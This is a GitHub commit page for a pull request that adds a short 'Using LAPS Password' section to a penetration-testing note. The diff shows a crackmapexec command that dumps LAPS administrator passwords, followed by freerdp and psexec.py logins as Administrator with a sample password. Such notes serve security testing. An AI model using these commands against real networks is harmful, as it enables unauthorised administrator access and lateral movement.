-
-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #906 from NoPurposeInLife/patch-3
Update laps.md
- Loading branch information
Showing
1 changed file
with
9 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -114,6 +114,15 @@ crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps | |
``` | ||
This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user. | ||
## ** Using LAPS Password ** | ||
``` | ||
freerdp /v:192.168.1.1:3389 /u:Administrator | ||
Password: 2Z@Ae)7!{9#Cq | ||
python psexec.py [email protected] | ||
Password: 2Z@Ae)7!{9#Cq | ||
``` | ||
## **LAPS Persistence** | ||
### **Expiration Date** | ||
|